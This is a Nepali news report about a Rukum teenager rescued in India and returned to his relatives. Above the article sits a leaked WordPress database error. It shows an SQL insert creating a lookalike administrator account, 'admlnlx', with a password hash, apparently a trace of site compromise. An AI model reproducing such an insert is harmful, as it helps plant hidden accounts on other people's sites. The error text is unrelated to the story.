WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnzdmNkiNXNFGcTwipeVxWrnpfqMKE0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:40:08', '', 'admlnlx', 'admlnlx')
रुकुम,पुस २७ –
भारतको गोरखपुरबाट चार वर्षअघि हराएका रुकुमका एक किशोरलाई प्रहरीले उद्धार गरी आफन्तको जिम्मा लगाइएको छ ।
आमाबुबाको साथमा भारत गएको बेला २०६९ सालमा हराएका खोलागाउँ–८ का १५ वर्षीय गोविन्द परियारलाई भारतीय प्रहरीको सहयोगमा उद्धार गरेर आफन्तको जिम्मा लगाएको हो ।
गत चैत १३ गते भारतीय प्रहरीले किशोरको उद्धार गरी नेपाल प्रहरीलाई बुझाएको भए पनि उनको वास्तविक ठेगाना थाहा नपाउँदा समस्या भएको थियो ।
नेपाल प्रहरीले किशोरलाई रुपन्देहीमा रहेको नेपाल अविनाश अनाथ आश्रममा राखेको थियो । जिल्ला बाल कल्याण समितिको समन्वयमा नेपालीलाई आज रुकुम पु¥याएर उनका कान्छाबुबा हीराबहादुर सार्कीको जिम्मा लगाएको बाल अधिकार अधिकृत मानवीर ओलीले जानकारी दिनुभयो । किशोरका आमाबुबा अहिले पनि भारतको गोरखपुरमा नै रहेको बताएको छ । – रासस